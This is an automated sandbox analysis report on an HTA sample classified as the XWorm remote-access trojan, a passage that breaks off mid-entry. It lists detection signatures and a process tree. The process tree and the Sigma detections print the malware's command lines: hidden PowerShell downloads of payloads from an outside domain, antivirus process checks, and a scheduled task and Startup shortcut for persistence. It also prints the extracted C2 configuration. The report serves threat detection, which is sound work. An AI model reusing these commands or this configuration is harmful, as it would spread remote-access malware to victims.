Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:c2.hta
Analysis ID:1575551
MD5:46db5c83fa1e4259626582d675a2daba
SHA1:9cecd043306e50fb5d6c6a8b4e13631aa8641555
SHA256:6b29ae721c54add4df7663f763f8be6a1a65259a2243d563a0f3c972ac64623a
Tags:htauser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 1368 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 1860 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • Acrobat.exe (PID: 7324 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7580 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7736 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 7340 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 7564 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • msword.exe (PID: 7968 cmdline: msword.exe MD5: C744E054E4EF01832BBF43B81D397B61)
        • cmd.exe (PID: 5328 cmdline: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 3748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2336 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 5756 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 1276 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3548 cmdline: cmd /c md 220239 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 5560 cmdline: findstr /V "DimPieLilHot" Statistical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3672 cmdline: cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Carter.pif (PID: 3900 cmdline: Carter.pif F MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • cmd.exe (PID: 7080 cmdline: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1312 cmdline: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 4500 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • RegAsm.exe (PID: 4904 cmdline: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • choice.exe (PID: 5272 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • cmd.exe (PID: 1544 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 3796 cmdline: timeout /t 90 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 5124 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DanielPulse.scr (PID: 7296 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • wscript.exe (PID: 8080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DanielPulse.scr (PID: 7308 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xed08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xeda5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xeeba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xe6e4:$cnc4: POST / HTTP/1.1
    00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x9e18:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x9eb5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x9fca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x97f4:$cnc4: POST / HTTP/1.1
      00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        28.3.Carter.pif.3c63cf0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          28.3.Carter.pif.3c63cf0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            28.3.Carter.pif.3c63cf0.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x7bf4:$cnc4: POST / HTTP/1.1
            28.3.Carter.pif.3c63cf0.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x99f4:$cnc4: POST / HTTP/1.1
            40.2.RegAsm.exe.5c0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 3900, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 4904, ProcessName: RegAsm.exe
              Sigma detected: Legitimate Application Dropped Script
              Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 1368, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c[1].bat
              Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7080, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 1312, ProcessName: schtasks.exe
              Sigma detected: Suspicious Invoke-WebRequest Execution
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1368, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 1860, ProcessName: cmd.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 5124, ProcessName: wscript.exe
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Carter.pif F, CommandLine: Carter.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: Carter.pif F, ProcessId: 3900, ProcessName: Carter.pif
              Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 3900, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 4904, ProcessName: RegAsm.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 3900, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 7968, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ProcessId: 5328, ProcessName: cmd.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7080, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 1312, ProcessName: schtasks.exe
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 3900, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 5124, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 